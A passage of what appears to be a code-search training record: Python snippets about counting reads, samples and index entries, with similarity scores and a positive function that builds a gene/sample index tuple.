example.features.feature['subreads/num_passes'].int64_list.value[0]", "def total_samples_processed(self):\n return self._total_samples_processed", "def get_count(cls):\n total = 0\n for counter in SimpleCounterShard.objects.all():\n total += counter.count\n return total", "def dcount(ev):\n profData = getProfilingData(ev)\n if profData is not None:\n a = profData.Descendants().AsArray()\n if len(a) > 0:\n return profData.DescendantCount(a[0])\n return \"\"", "def get_total_rows(max_passes: int) -> int:\n # For each of `max_subreads`, we have three pieces of information: bases, PW,\n # and IP. We also have four rows for SN, and one for strand.\n # The information is structured as follows:\n # Bases: (0, params.max_passes - 1) represent bases.\n # PW: rows params.max_passes to (params.max_passes * 2 - 1)\n # IP: rows (params.max_passes * 2) to (params.max_passes * 3 - 1)\n # Strand: rows (params.max_passes * 3) to (params.max_passes * 4)\n # CCS+SN: rows (params.max_passes * 4 + 1) to (params.max_passes * 4 + 5)\n # The last five rows are CCS sequence (1), and SN (4).\n return (max_passes * 4) + 5", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def get_total_count(self):\n return self.total_count", "def get_doc_count(self, index_name, doc_type):\n return self.es.count(index_name, doc_type)[\"count\"]", "def count_total(self):\n\t\twith self._c_lock: # I can't believe I implemented a lock for a counter. Safety first, I guess...\n\t\t\treturn self._total_count", "def count(seq):\n\treturn sum(1 for x in seq)", "def readlen(store, cutoff=30, filter_srrs=None, keep_srrs=None):\n df = store['prealn/workflow/fastq'].copy()\n df.reset_index(inplace=True)\n df = remove_rows(df, 'srr', filter_srrs)\n df = keep_rows(df, 'srr', keep_srrs)\n df['len'] = df[['avgLen_R1', 'avgLen_R2']].max(axis=1)\n\n return df.loc[df['len'] >= cutoff, ['srx', 'srr']]", "def countNodes(epr):\n result = 1\n argLst = epr.args\n for arg in argLst:\n result += countNodes(arg)\n return result", "def contig_count(contig):\n return sum([1 for line in open(contig, 'rU').readlines() if line.startswith('>')])", "def count_total(self):\n\t\twith self._c_lock: # I can't believe I implemented a lock for a counter. Safety first, I guess...\n\t\t\treturn self._total_count", "def total_read_throughput(self):\n total = self.read_throughput\n for index in six.itervalues(self.global_indexes):\n total += index.read_throughput\n return total", "def count(self, e):\n try:\n return self.vals[e]\n except:\n return 0", "def count_matches(sam_input):\n logging.info(\"Counting aligned bases in %s ...\", sam_input.name)\n\n total_bases = 0\n with pysam.AlignmentFile(sam_input, \"r\") as sam:\n for read in sam:\n total_bases += aligned_bases(read.cigar)\n return total_bases", "def total_exs(dataset):\n total = 0\n for article in dataset['data']:\n for para in article['paragraphs']:\n total += len(para['qas'])\n return total", "def hit_coverage(self):\n s = self.hit_aln.replace(\"=\", \"\")\n return len(s)", "def _get_hit_count(self, database, enquire):\n return self._get_enquire_mset(\n database, enquire, 0, database.get_doccount()\n ).size()", "def est_read_len(fq, reads=100):\n if is_gz_file(fq):\n openf = gzip.open\n else:\n openf = open\n readlens = []\n with openf(fq) as f:\n try: # File less than 4*reads lines\n for _ in range(reads):\n next(f)\n readlens.append(len(next(f).strip()))\n next(f), next(f)\n except:\n pass\n return median(readlens)", "def total_count(self):\n res = self.con.execute('select sum(count) from cc').fetchone();\n if res == None:\n return 0\n return res[0]", "def _cmd_genemetrics(args):\n cnarr = read_cna(args.filename)\n segarr = read_cna(args.segment) if args.segment else None\n is_sample_female = verify_sample_sex(cnarr, args.sample_sex, args.male_reference, args.diploid_parx_genome)\n # TODO use the stats args\n table = do_genemetrics(\n cnarr,\n segarr,\n args.threshold,\n args.min_probes,\n args.drop_low_coverage,\n args.male_reference,\n is_sample_female,\n args.diploid_parx_genome,\n )\n logging.info(\"Found %d gene-level gains and losses\", len(table))\n write_dataframe(args.output, table)", "def getQiimeSffSamplesCount(self,sample):\n try:\n con = self.getSFFDatabaseConnection()\n results = 0\n query_results=con.cursor().callproc('get_qiime_sff_samples_count', \\\n [str(sample),results])\n return query_results\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), str(e))\n return False", "def count(a, sub, start=0, end=None):\n return _vec_string(a, int_, 'count', [sub, start] + _clean_args(end))", "def count(self):\n return len(self.read_ints())", "def countReads(commands_list, bamFile,\n referenceGTF = \"/n/data1/hms/dbmi/farhat/Jerry/References/GCF_000195955.2_ASM19595v2_genomic.gtf\"):\n outputName = genReadcountsName(bamFile)\n countCommand = \"featureCounts -t gene -g locus_tag -a {refGTF} -o {outputName} {bFile}\".format(\n refGTF = referenceGTF, outputName = outputName, bFile = bamFile)\n commands_list.append(countCommand)", "def count():", "def count_coverage(self, contig=None, start=None, stop=None, region=None,\n quality_threshold=15, read_callback='all',\n reference=None, end=None, base_quality_threshold=0):\n\n signature = locals()\n for key in ['self', 'quality_threshold', 'read_callback', 'base_quality_threshold']:\n signature.pop(key)\n\n adenine = array.array('L', [0] * (stop - start + 1))\n cytosine = adenine[:]\n guanine = adenine[:]\n thymine = adenine[:]\n\n for read in self.fetch(**signature):\n if read.cigarstring is not None and read.mapq >= quality_threshold:\n if filter_read(read, read_callback):\n for base, index in cigar_alignment(seq=read.seq, cigar=read.cigarstring,\n start_pos=read.pos, qualities=read.query_qualities,\n base_qual_thresh=base_quality_threshold):\n if start <= index <= stop:\n if base == 'A':\n adenine[index - start] += 1\n elif base == 'G':\n guanine[index - start] += 1\n elif base == 'C':\n guanine[index - start] += 1\n elif base == 'T':\n thymine[index - start] += 1\n else:\n raise ValueError('Read base was {}, not A, T, C, or G'.format(base))\n\n return adenine, cytosine, guanine, thymine", "def get_count(bam, max_workers):\n print (\"Count total number of paired reads in %s ...\"%bam)\n cmd = ['samtools','view','-c','-f', '3','-@',str(max_workers),bam]\n out, err = subprocess.Popen(cmd, stdin = subprocess.PIPE, stdout=subprocess.PIPE).communicate()\n return int(out.split()[0])", "def count(self, contig=None, start=None, stop=None, region=None,\n until_eof=False, tid=None, read_callback='nofilter',\n reference=None, end=None):\n\n # pass the signature to fetch\n signature = locals()\n signature.pop('read_callback')\n signature.pop('self')\n roi_reads = self.fetch(**signature)\n # make `nofilter` the default filter unless told otherwise\n # read_callback = kwargs.get('read_callback', 'nofilter')\n\n # go through all the reads over a given region and count them\n count = 0\n for read in roi_reads:\n if filter_read(read, read_callback):\n count += 1\n return count", "def count(self, chromosome):\n return self.chromosome_list.count(to_chromosome(chromosome))", "def count(self, sub) -> int:\n pass", "def calculate_reference(gram_list, references):\n gram_sub_str = ' '.join(gram_list)\n gram_count = []\n for item in references:\n # calculate the count of the sub string\n gram_count.append(len(re.findall(gram_sub_str, item)))\n return gram_count", "def getQiimeSffReadCounts(self,seq_run_id):\n try:\n con = self.getSFFDatabaseConnection()\n results = con.cursor()\n con.cursor().callproc('get_qiime_sff_read_counts', \\\n [seq_run_id,results])\n return results\n except Exception, e:\n print 'Exception caught: %s.\\nThe error is: %s' % (type(e), str(e))\n return False", "def written_reads(self) -> int:\n return sum(self._written_lengths1.values())", "def get_total_result_count(self, *args, **kwargs):\n return 0", "def total(self):\n return self._evaluate()['hits']['total']", "def calculate_reference(gram_list, references):\r\n gram_sub_str = ' '.join(gram_list)\r\n gram_count = []\r\n for item in references:\r\n # calculate the count of the sub string\r\n gram_count.append(len(re.findall(gram_sub_str, item)))\r\n return gram_count", "def count(sequences, ordering = None, material = 'rna',\n dangles = 'some', T = 37, multi = True, pseudo = False,\n sodium = 1.0, magnesium = 0.0):\n \n ## Set up command-line arguments and input\n args, cmd_input = \\\n setup_nupack_input(exec_name = 'count', sequences = sequences, ordering = ordering,\n material = material, sodium = sodium, magnesium = magnesium,\n dangles = dangles, T = T, multi = multi, pseudo = pseudo)\n \n ## Perform call\n output, error = call_with_pipe(args, cmd_input)\n\n ## Parse and return output\n if output[-3] != \"% Total number of secondary structures:\" :\n raise NameError('NUPACK output parsing problem')\n\n return float(output[-2]) # the number of structures can be very large", "def uses(self):\n recipe_count = Quantity.query.filter_by(id_ingredient=self.id).count()\n subrecipe_count = Subquantity.query.filter_by(id_ingredient=self.id).count()\n return recipe_count + subrecipe_count", "def _calc_coverage(self, cds_aln):\n # Aligned region is part of a read that intersects with cds.\n coverage = 0\n for aln_reg in cds_aln.aligned_regions.values(): # aln_reg is of type CdsAlnSublocation\n location = aln_reg.location # location is of type Location\n coverage += location.length()\n coverage = coverage / float(Location.from_location_str(cds_aln.cds.location).length())\n return coverage", "def read_count(self):\n return self._read_count", "def getTotalIndividualCount(self):\r\n return self._n", "def total_count(self) -> int:\n return self.__total_count", "def Count_Documents(db):\r\n \r\n count = db.Transaction.estimated_document_count()\r\n print(\"Number of documents in the database Transaction: \" + str(count) + \".\\n\")\r\n return count", "def count(self):\n return self._reduce_for_stat_function(F.count, only_numeric=False)", "def gal_count(clusters):\n sum = 0\n for x in clusters:\n sum += x.ngal\n return sum", "def getReferenceIndividualCount(self, sample_id):\r\n if sample_id in self._data:\r\n return self._data[sample_id][0]\r\n else:\r\n raise ValueError(\"Unknown sample '%s'.\" % sample_id)", "def total_record_count(self) -> int:\n return pulumi.get(self, \"total_record_count\")", "def _get_count(self, msg, subtype=\"all\"):\n try:\n counts = self.get_local(msg, \"counts\")\n return counts.get(subtype, 0)\n except KeyError:\n return 0", "def totalcounts(self):\n return self.datacounts + self.bkgdcounts", "def count_unique_mirbase_reads(bam, counts_file):\n count_ref_hits(bam, counts_file)", "def CountOccurrences(pattern, bwt, starts, occ_counts_before):\n # Implement this function yourself\n return 0", "def compute_reread_counts(self, question, context):\n\n # Checks that the question and context are not blank\n if question == '' or context == '':\n return {}\n\n # Collects the reread count for every student id of the provided context and question\n raw_reread_counts = []\n for row in self.responses:\n table_context = row.context.text\n table_question = row.question.text\n view_count = len(row.get_parsed_views())\n if context in table_context:\n if question in table_question:\n raw_reread_counts.append(view_count)\n\n # Tallies the raw reread counts into the dictionary to be returned\n organized_data = {}\n mean_reread_count = 0\n sum_of_views = 0\n student_count = 0\n final_student_count = 0\n\n for entry in raw_reread_counts:\n if entry in organized_data.keys():\n organized_data[entry] += 1\n elif len(raw_reread_counts) != 0:\n organized_data.update({entry: 1})\n keys_of_dictionary = organized_data.keys()\n for entry in keys_of_dictionary:\n sum_of_views += entry * organized_data[entry]\n student_count += organized_data[entry]\n\n if student_count == 0:\n return 0\n else:\n mean_reread_count = round((sum_of_views / student_count), 2)\n sum_of_views = 0\n final_student_count = student_count\n student_count = 0\n\n print(organized_data)\n return [question, context, mean_reread_count, final_student_count]", "def count_region(\n reference_seq, # type: pyfaidx.Fasta\n region, # type: Tuple[str, int, int]\n pattern=None # type: Optional[str]\n): # type: (...) -> int\n\n chrom, start, end = region\n seq = reference_seq[chrom][int(start):int(end)]\n\n return _count_sequence(seq, regex=_build_regex(pattern))", "def read_counter(self, path):\n self.cursor.execute('SELECT * FROM \"counter\" WHERE \"fullpath\"=?', (path,))\n row = self.cursor.fetchone()\n count = 0\n if row != None : count = row[1]\n # print 'read_counter:', path, count\n return count", "def get_num_cat(sample_by_cat, samples_in_otus):\r\n num_cat = defaultdict(int)\r\n for cat, samples in sample_by_cat.items():\r\n num_samples = len(set(samples_in_otus) & set(samples))\r\n num_cat[cat[0]] += (num_samples * (num_samples - 1)) / 2\r\n return num_cat" ]
[ "0.71968734", "0.64680296", "0.624144", "0.60355866", "0.6020118", "0.58288175", "0.57842183", "0.5721398", "0.5674062", "0.56387067", "0.5625821", "0.5600439", "0.5572864", "0.55386955", "0.55117846", "0.550808", "0.5496517", "0.54497534", "0.5437835", "0.5402488", "0.5394301", "0.5366214", "0.5363972", "0.5338241", "0.53251344", "0.5300818", "0.5290096", "0.5253027", "0.5222011", "0.5221696", "0.52191573", "0.5175918", "0.51706153", "0.51699257", "0.5167019", "0.5161605", "0.5153482", "0.5121976", "0.50951433", "0.50930685", "0.50809497", "0.507583", "0.5046757", "0.50288826", "0.50248224", "0.50142854", "0.501218", "0.50121444", "0.50077", "0.50056845", "0.4996999", "0.49959436", "0.49957168", "0.4995682", "0.4992105", "0.4991454", "0.49905407", "0.4989414", "0.49833974", "0.49820817", "0.49780592", "0.49748522", "0.49697375", "0.49668804", "0.4958708", "0.49490687", "0.49428323", "0.49385154", "0.49334276", "0.49294335", "0.49261394", "0.49184963", "0.49151227", "0.49131745", "0.49089465", "0.49073097", "0.4903559", "0.49018472", "0.49009436", "0.4893753", "0.48911914", "0.488613", "0.48794642", "0.4879093", "0.48776734", "0.48734754", "0.48650447", "0.48616827", "0.48571163", "0.48546368", "0.4854573", "0.4847396", "0.4843254", "0.4842486", "0.4836102", "0.48353195", "0.4831139", "0.48232207", "0.48231754", "0.4819829" ]
0.5925086
5
Create a aggregated Index with namedtuple idx Combine the gene_idx, sample_idx
def get_idx(countinfo, sample, gene_idx): if not countinfo is None: if not sample in countinfo.sample_idx_dict: sample_idx = None logging.warning("utils.py: The sample {} is not in the count file. Program proceeds without outputting expression data.".format(sample)) else: sample_idx = countinfo.sample_idx_dict[sample] else: sample_idx = None return Idx(gene_idx, sample_idx)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_gene_indexes(df):\n\tgeneDict = OrderedDict()\n\n\tgeneCount = 0\n\tpreviousGeneIndex = 0\n\n\tcurrent_id=\"\"\n\tcurrent_gene=\"\"\n\n\tfor i in range(len(df)):\n\n\t\tif df.loc[i,'feature'] == 'gene':\n\t\t\ttrdict = parse_entry(df.loc[i,'transcript_id'])\n\n\t\t\tcurGeneID = trdict['gene_id'][0]\n\t\t\n\t\t\tif geneCount != 0:\n\t\t\t\tnewGeneIndex = i\n\t\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\t\t\t\tpreviousGeneIndex = i\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\t\tgeneCount += 1\n\n\t\t\telse:\n\t\t\t\tnewgeneIndex = 0\n\t\t\t\tgeneCount +=1\n\t\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\tif i == (len(df)-1):\n\t\t\tnewGeneIndex = i+1\n\t\t\tcurrent_id = trdict['gene_id'][0]\n\t\t\tgeneDict[current_id] = [previousGeneIndex,newGeneIndex]\n\treturn geneDict", "def build_index():\n pass", "def create_index():", "def index_add(all_index, this_index, samples, caller):\n for key, record in this_index.iteritems():\n if key not in all_index:\n all_index[key] = {}\n for sample_id in samples:\n if sample_id not in all_index[key]:\n all_index[key][sample_id] = {caller: []}\n elif caller not in all_index[key][sample_id]:\n all_index[key][sample_id][caller] = []\n # NB: If caller was run twice, will have 2 records here\n all_index[key][sample_id][caller].append(record)", "def _idx(name, at_level=None, type=None):\n cls = pd.Index\n kwargs = dict(name=name)\n\n if name == 'CURRENCY':\n data = ['NZD', 'RUB']\n elif name == 'TIME_PERIOD':\n data = ['2013-01-18', '2013-01-21']\n if type == pd.Period:\n cls = pd.PeriodIndex\n kwargs['freq'] = 'D'\n\n idx = cls(data, **kwargs)\n\n if at_level is not None:\n # Add sample_attrs as extra pd.MultiIndex levels on df.columns\n names = list(sample_attrs.keys())\n iterables = [[v] for v in sample_attrs.values()]\n names.insert(at_level, name)\n iterables.insert(at_level, idx)\n return pd.MultiIndex.from_product(iterables, names=names)\n else:\n return idx", "def return_index(self, idx):\n return (\n self.timeseries[idx],\n self.ch_amount,\n self.freq[idx],\n self.ch_name[idx],\n self.units[idx],\n )", "def index_object(idxs=None):", "def build_index(self):\n self.rebuild_index()", "def return_index(self, idx):\n return (\n self.timeseries[:, idx],\n self.ch_amount,\n self.freq,\n self.ch_name[idx],\n self.units[idx],\n self.start_time,\n )", "def create_index(log_df, column):\n temp_list = log_df[[column]].values.tolist()\n subsec_set = {(x[0]) for x in temp_list}\n subsec_set = sorted(list(subsec_set))\n alias = dict()\n for i, _ in enumerate(subsec_set):\n alias[subsec_set[i]] = i + 1\n return alias", "def generate_inv_index(people):\n pass", "def createindexes():\n index = [{}, {}, {}, {}]\n readcorpus(index)\n buildindex4(index[2], index[3])\n writeindextofile(index)\n return index", "def index(self, index):\n index.column_protein[self.column].add((self.protein,self.protein_res))\n index.protein_domain[(self.protein.id,self.protein_res)] = (self.domain,self.domain_res)\n index.domain_structure[(self.domain.id,self.domain_res)].add((self.structure,self.structure_res))\n index.structure[(self.structure.index, self.structure_res)] = self", "def get_index(self, _quals):\n return self._options['index']", "def _get_ea_index():\n ea_index_temp = {'Address': 5, 'Agency': 10, 'City': 4, 'Country': 3,\n 'Datacenter': 7, 'Division': 8, 'Interface Name': 13,\n 'Region_List': 2, 'Requester Email': 9, 'Site': 6,\n 'VLAN Description': 11, 'IPR Designation': 16}\n return ea_index_temp", "def _generate_index_analysis(self, query_analysis, indexes):\r\n needs_recommendation = True\r\n full_indexes = []\r\n partial_indexes = []\r\n coverage = \"unknown\"\r\n\r\n if indexes is not None:\r\n for index_key in indexes.keys():\r\n index = indexes[index_key]\r\n index_report = self._generate_index_report(index,\r\n query_analysis)\r\n if index_report['supported'] is True:\r\n if index_report['coverage'] == 'full':\r\n full_indexes.append(index_report)\r\n if index_report['idealOrder']:\r\n needs_recommendation = False\r\n elif index_report['coverage'] == 'partial':\r\n partial_indexes.append(index_report)\r\n\r\n if len(full_indexes) > 0:\r\n coverage = \"full\"\r\n elif (len(partial_indexes)) > 0:\r\n coverage = \"partial\"\r\n elif query_analysis['supported']:\r\n coverage = \"none\"\r\n\r\n # INDEX ANALYSIS\r\n return OrderedDict([('indexStatus', coverage),\r\n ('fullIndexes', full_indexes),\r\n ('partialIndexes', partial_indexes)])", "def create_indices():\n destroy_indices()\n\n ActionDocument._index.create(ignore=[400, 404])\n ClassificationDocument._index.create(ignore=[400, 404])\n FunctionDocument._index.create(ignore=[400, 404])\n PhaseDocument._index.create(ignore=[400, 404])\n RecordDocument._index.create(ignore=[400, 404])\n\n yield\n\n destroy_indices()", "def create_index(shapes_with_props):\n index = rtree.index.Index()\n for id, shape_with_props in enumerate(shapes_with_props):\n index.insert(id, shape_with_props.shape.bounds)\n return index", "def get_index(self, *args, **dargs):\n pass", "def _generate_index_analysis(self, query_analysis, indexes):\n needs_recommendation = True\n full_indexes = []\n partial_indexes = []\n coverage = \"unknown\"\n\n if indexes is not None:\n for index_key in indexes.keys():\n index = indexes[index_key]\n index_report = self._generate_index_report(index,\n query_analysis)\n if index_report['supported'] is True:\n if index_report['coverage'] == 'full':\n full_indexes.append(index_report)\n if index_report['idealOrder']:\n needs_recommendation = False\n elif index_report['coverage'] == 'partial':\n partial_indexes.append(index_report)\n\n if len(full_indexes) > 0:\n coverage = \"full\"\n elif (len(partial_indexes)) > 0:\n coverage = \"partial\"\n elif query_analysis['supported']:\n coverage = \"none\"\n\n # INDEX ANALYSIS\n return OrderedDict([('indexStatus', coverage),\n ('fullIndexes', full_indexes),\n ('partialIndexes', partial_indexes)])", "def _group_indexes(self, indexes):\n for index_name, (cardinality, link_names) in indexes:\n for link_name in link_names:\n yield link_name, index_name", "def combine_index(vcf_fnames):\n data_pile = collections.defaultdict(list)\n all_idx = collections.OrderedDict()\n all_samples = set()\n vcf_to_samples={}\n for vcf_fname in vcf_fnames:\n vr = vcf.Reader(filename=vcf_fname)\n caller = guess_caller(vr)\n samples = clean_samples(vr)\n vr.samples = samples\n idx = index_records(vr)\n print(vcf_fname, len(idx), caller, *samples, sep='\\t', file=sys.stderr)\n vcf_to_samples[vcf_fname] = samples\n data_pile[caller].append((idx, samples))\n all_samples.update(samples)\n for idx, samples, caller in cleanse_callers(data_pile):\n index_add(all_idx, idx, samples, caller)\n return sorted(all_idx.iteritems(), key=sortkey), sorted(all_samples), vcf_to_samples", "def instantiate_indexor(prefix, width):\n stdlib = py_ast.Stdlib()\n name = py_ast.CompVar(NAME_SCHEME[\"index name\"].format(prefix=prefix))\n add_name = py_ast.CompVar(f\"{prefix}_add\")\n cells = [\n py_ast.Cell(name, stdlib.register(width)),\n py_ast.Cell(add_name, stdlib.op(\"add\", width, signed=False)),\n ]\n\n init_name = py_ast.CompVar(NAME_SCHEME[\"index init\"].format(prefix=prefix))\n init_group = py_ast.Group(\n init_name,\n connections=[\n py_ast.Connect(\n py_ast.ConstantPort(width, 2 ** width - 1), py_ast.CompPort(name, \"in\")\n ),\n py_ast.Connect(\n py_ast.ConstantPort(1, 1), py_ast.CompPort(name, \"write_en\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"done\"), py_ast.HolePort(init_name, \"done\")\n ),\n ],\n )\n\n upd_name = py_ast.CompVar(NAME_SCHEME[\"index update\"].format(prefix=prefix))\n upd_group = py_ast.Group(\n upd_name,\n connections=[\n py_ast.Connect(\n py_ast.ConstantPort(width, 1), py_ast.CompPort(add_name, \"left\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"out\"), py_ast.CompPort(add_name, \"right\")\n ),\n py_ast.Connect(\n py_ast.CompPort(add_name, \"out\"), py_ast.CompPort(name, \"in\")\n ),\n py_ast.Connect(\n py_ast.ConstantPort(1, 1), py_ast.CompPort(name, \"write_en\")\n ),\n py_ast.Connect(\n py_ast.CompPort(name, \"done\"), py_ast.HolePort(upd_name, \"done\")\n ),\n ],\n )\n\n return (cells, [init_group, upd_group])", "def gen_search_index(record, link_content=None):\n document_id = record[\"document_id\"]\n record_index = {\n \"document_name\": record[\"document_name\"],\n \"document_type\": record[\"document_type\"].__name__,\n \"content\": record[\"content\"],\n \"authors\": record[\"authors\"],\n \"publish_date\": record[\"publish_date\"],\n \"link_content\": link_content,\n }\n return (document_id, record_index)", "def _index_key(self, sig, codegen):\n return (sig, codegen.magic_tuple())", "def gene(self, idx):\r\n return self.genes[idx]", "def _construct_index(self, row) -> str:\n chrom = row[\"CHROM\"]\n pos = row[\"POS\"]\n ref = row[\"REF\"]\n alt = row[\"ALT\"]\n\n return f\"{chrom}_{pos}_{ref}>{alt}\"", "def build_transcript_indexes(geneDictCoding, df):\n\n\tTR_index_dict = OrderedDict()\n\n\tfor gene in geneDictCoding:\n\n\t\ttrDF = df.iloc[geneDictCoding[gene][0]:geneDictCoding[gene][1]]\n\t\n\t\ttrPrev = -1\n\t\ttrNamePrev = \"\"\n\t\t\n\t\t### iterate through a slice of the data frame for each gene\n\t\t### search for transcripts over that slice\n\t\t### find transcript slices\n\t\tfor i in range(geneDictCoding[gene][0], geneDictCoding[gene][1]):\n\t\t\tif trDF.loc[i,'feature'] == 'transcript':\n\t\t\t\ttrdict = parse_entry(trDF.loc[i,'transcript_id'])\n\t\t\t\ttrCur = i\n\t\t\t\ttrNameCur = trdict['transcript_id'][0]\n\t\t\t\t\n\t\t\t\tif trPrev != -1: # do not make an entry for the first transcript\n\t\t\t\t\tTR_index_dict[trNamePrev] = [trPrev, trCur]\n\n\t\t\t\ttrPrev = trCur\n\t\t\t\ttrNamePrev = trNameCur\n\t\t\t\n\t\t\t### for the final transcript\n\t\t\tif i == geneDictCoding[gene][1]-1:\n\t\t\t\ttrdict = parse_entry(trDF.loc[i,'transcript_id'])\n\t\t\t\tTR_index_dict[trdict['transcript_id'][0]] = [trCur, i+1]\n\treturn TR_index_dict", "def __reduce__(self):\n d = {\n \"levels\": list(self.levels),\n \"codes\": list(self.codes),\n \"sortorder\": self.sortorder,\n \"names\": list(self.names),\n }\n return ibase._new_Index, (type(self), d), None", "def init_index(self):\n raise NotImplementedError", "def _generate_sample_indexes(random_state, n_samples, n_samples_bootstrap):\n # Obtain the random state\n random_state = check_random_state(random_state)\n\n # Obtain the indexes for the samples taking\n # into account the total number of samples\n # and the number of samples to be taken\n sample_indexes = random_state.randint(0, n_samples, n_samples_bootstrap)\n\n # Return them\n return sample_indexes", "def create_metadata_indices(meta_file):\n logging.info('Loading gene metadata...')\n # genes\n header = {}\n #gene_idx = {}\n idx = collections.defaultdict(dict)\n tax_levs = ['domain','phylum','class','order','family','genus','species']\n with open(meta_file) as inF:\n for i,line in enumerate(inF):\n line = line.rstrip().split('\\t')\n if i == 0:\n header = {x.lower():i for i,x in enumerate(line)}\n continue\n # genes\n cluster_id = line[header['annotation']]\n gene_uuid = line[header['gene_uuid']]\n genomeID = line[header['genomeid']]\n genome_len = line[header['genome_len']]\n tax = tuple([line[header[x]] for x in tax_levs])\n try:\n idx[cluster_id][tax][genomeID]['gene_ids'].append(gene_uuid)\n except KeyError:\n idx[cluster_id][tax] = {genomeID : {'gene_ids' : [gene_uuid],\n 'genome_len' : genome_len}}\n metadata_summary(idx)\n return idx", "def create_index(self):\r\n\r\n #### Begin functionality here\r\n\r\n return()", "def construct_indu_index_mapping(df):\n industries_to_index = {}\n industries = df[\"ggroup\"].dropna().astype(int).unique()\n industries = industries.tolist()\n quarters = (df[\"year\"].astype(\"str\") + \" q\" + df[\"quarter\"].astype(\"str\")).unique()\n for i in range(df.shape[0]):\n row = df.iloc[i, :]\n if math.isnan(row[\"ggroup\"]):\n continue\n industries_to_index[int(row[\"ggroup\"])] = industries_to_index.get(int(row[\"ggroup\"]), set())\n industries_to_index[int(row[\"ggroup\"])].add(i)\n return industries_to_index", "def build_index(self):\n \n \n geoids = self.partitions.find_or_new(table='facilities_geoids')\n addresses = self.partitions.find_or_new(table='facilities_addresses')\n facilities = self.partitions.find(table='facilities')\n \n facilities.attach(addresses,'addresses')\n facilities.attach(geoids,'geoids')\n \n q = \"\"\"\n SELECT year, type, oshpd_id, facility_name, dba_city, dba_zip_code, blockgroup_gvid, tract_gvid, county_gvid\n FROM facilities\n JOIN geoids.facilities_geoids AS geoids ON geoids.facilities_id = facilities.id\n JOIN addresses.facilities_addresses AS addresses ON addresses.facilities_id = facilities.id\n \"\"\"\n \n p = self.partitions.find_or_new(table='facilities_index')\n p.clean()\n lr = self.init_log_rate()\n \n with p.inserter() as ins:\n for row in facilities.query(q):\n ins.insert(row)\n lr(str(p.identity))", "def __return_feature_index__(self, tup):\n index = self._features_index.get(tup, False)\n return index", "def _build_groupby_indices(df, table_name, join_columns):\n log.info(\"Grouping table '{}' by: {}.\".format(table_name,\n \", \".join(join_columns)))\n ret = df.groupby(join_columns).indices\n if len(join_columns) == 1:\n # Manually patch the dictionary to make sure its keys are tuples.\n ret = {(k,): v for k, v in ret.items()}\n return ret", "def build_coverage_index(\n self,\n data_pack: DataPack,\n outer_type: Type[Annotation],\n inner_type: Type[EntryType]):\n if not isinstance(inner_type, (Annotation, Link, Group)):\n raise ValueError(f\"Do not support coverage index for {inner_type}.\")\n\n if not self.coverage_index_is_valid:\n self._coverage_index = dict()\n\n # prevent the index from being used during construction\n self.deactivate_coverage_index()\n\n self._coverage_index[(outer_type, inner_type)] = dict()\n for range_annotation in data_pack.get_entries_by_type(outer_type):\n if isinstance(range_annotation, Annotation):\n entries = data_pack.get(inner_type, range_annotation)\n entry_ids = {e.tid for e in entries}\n self._coverage_index[\n (outer_type, inner_type)][range_annotation.tid] = entry_ids\n\n self.activate_coverage_index()", "def create_index_item(doc, destination_index):\n\n action = { 'index' : { '_index' : destination_index, '_type' : doc['_type'] } }\n data = doc['_source']\n return action, data", "def _BuildEventTagIndex(self):\n self._event_tag_index = {}\n for event_tag in self.GetEventTags():\n event_identifier = event_tag.GetEventIdentifier()\n lookup_key = event_identifier.CopyToString()\n self._event_tag_index[lookup_key] = event_tag.GetIdentifier()", "def _generate_index_report(self, index, query_analysis):\r\n\r\n all_fields = []\r\n equiv_fields = []\r\n sort_fields = []\r\n range_fields = []\r\n\r\n for query_field in query_analysis['analyzedFields']:\r\n all_fields.append(query_field['fieldName'])\r\n if query_field['fieldType'] is EQUIV_TYPE:\r\n equiv_fields.append(query_field['fieldName'])\r\n elif query_field['fieldType'] is SORT_TYPE:\r\n sort_fields.append(query_field['fieldName'])\r\n elif query_field['fieldType'] is RANGE_TYPE:\r\n range_fields.append(query_field['fieldName'])\r\n\r\n max_equiv_seq = len(equiv_fields)\r\n max_sort_seq = max_equiv_seq + len(sort_fields)\r\n max_range_seq = max_sort_seq + len(range_fields)\r\n\r\n coverage = 'none'\r\n query_fields_covered = 0\r\n query_field_count = query_analysis['fieldCount']\r\n supported = True\r\n ideal_order = True\r\n for index_field in index['key']:\r\n field_name = index_field[0]\r\n\r\n if index_field[1] == '2d':\r\n supported = False\r\n break\r\n\r\n if field_name not in all_fields:\r\n break\r\n\r\n if query_fields_covered == 0:\r\n coverage = 'partial'\r\n\r\n if query_fields_covered < max_equiv_seq:\r\n if field_name not in equiv_fields:\r\n ideal_order = False\r\n elif query_fields_covered < max_sort_seq:\r\n if field_name not in sort_fields:\r\n ideal_order = False\r\n elif query_fields_covered < max_range_seq:\r\n if field_name not in range_fields:\r\n ideal_order = False\r\n query_fields_covered += 1\r\n if query_fields_covered == query_field_count:\r\n coverage = 'full'\r\n\r\n # INDEX REPORT\r\n return OrderedDict({\r\n 'coverage': coverage,\r\n 'idealOrder': ideal_order,\r\n 'queryFieldsCovered': query_fields_covered,\r\n 'index': index,\r\n 'supported': supported\r\n })", "def _generate_index_report(self, index, query_analysis):\n\n all_fields = []\n equiv_fields = []\n sort_fields = []\n range_fields = []\n\n for query_field in query_analysis['analyzedFields']:\n all_fields.append(query_field['fieldName'])\n if query_field['fieldType'] is EQUIV_TYPE:\n equiv_fields.append(query_field['fieldName'])\n elif query_field['fieldType'] is SORT_TYPE:\n sort_fields.append(query_field['fieldName'])\n elif query_field['fieldType'] is RANGE_TYPE:\n range_fields.append(query_field['fieldName'])\n\n max_equiv_seq = len(equiv_fields)\n max_sort_seq = max_equiv_seq + len(sort_fields)\n max_range_seq = max_sort_seq + len(range_fields)\n\n coverage = 'none'\n query_fields_covered = 0\n query_field_count = query_analysis['fieldCount']\n supported = True\n ideal_order = True\n for index_field in index['key']:\n field_name = index_field[0]\n\n if index_field[1] == '2d':\n supported = False\n break\n\n if field_name not in all_fields:\n break\n\n if query_fields_covered == 0:\n coverage = 'partial'\n\n if query_fields_covered < max_equiv_seq:\n if field_name not in equiv_fields:\n 